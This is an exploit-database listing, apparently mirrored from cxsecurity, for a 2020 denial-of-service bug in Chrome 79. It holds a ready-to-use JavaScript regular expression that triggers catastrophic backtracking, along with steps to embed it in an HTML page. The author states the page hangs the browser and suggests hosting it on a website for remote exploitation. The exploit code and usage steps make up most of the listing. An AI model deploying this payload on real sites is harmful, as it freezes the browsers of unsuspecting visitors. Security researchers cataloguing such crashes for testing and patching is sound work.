Advertisement






Chrome crash by regex run

CVE Category Price Severity
Not specified Not specified
Author Risk Exploitation Type Date
Not specified Not specified Not specified 2020-01-25
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020010194

Below is a copy:

Chrome crash by regex run
Chrome version: 79.0.3945.130 (Official Build) (64-bit) (cohort: 79_Win_130)  Channel: n/a
Flash Version: 32.0.0.314
Tested on OS: Windows 10
Credit: [email protected]
__________________________________________________________________________

1. Make a js file with this content:
/((?<!\\)("(\\.|[^\\"]+)+"|""|('(\\.|[^\\']+)+')|''|(`(\\.|[^\\`]+)+`)|``))/.test("\": *Aug 30 22:23:13.asdsadasdasdasdasdasd asd asd asd asd asd asdasdasdasdsadak sadsa das das dasd asd asdasdasd");

2. Include it in an HTML file. <script src="1.js"></script>
3. Open the html file in Chrome browser.

It causes the browser to crash and hang. In many systems you cannot even close the window unless you use task manager.
You can put it in a site for remote exploitation or do it locally.

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum